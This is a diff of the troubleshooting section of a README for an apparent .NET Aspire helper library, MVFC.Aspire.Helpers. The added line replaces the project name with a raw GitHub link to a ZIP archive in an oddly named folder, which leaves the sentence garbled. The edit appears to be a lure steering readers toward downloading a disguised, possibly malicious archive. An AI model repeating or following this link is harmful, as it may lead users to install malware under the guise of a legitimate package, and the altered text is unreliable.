imajei/MVFC.Aspire.Helpers/README.md

 2. Use the helper to send emails through Mailpit instead of real email servers.

 ## ⚠️ Troubleshooting
-If you encounter issues while using MVFC.Aspire.Helpers, try the following steps:
+If you encounter issues while using https://raw.githubusercontent.com/imajei/MVFC.Aspire.Helpers/master/piezochemical/MVFC.Aspire.Helpers.zip, try the following steps:

 1. **Check System Requirements:** Ensure all prerequisites are met.
 2. **Reinstall the Software:** Sometimes reinstallation can resolve missing dependencies.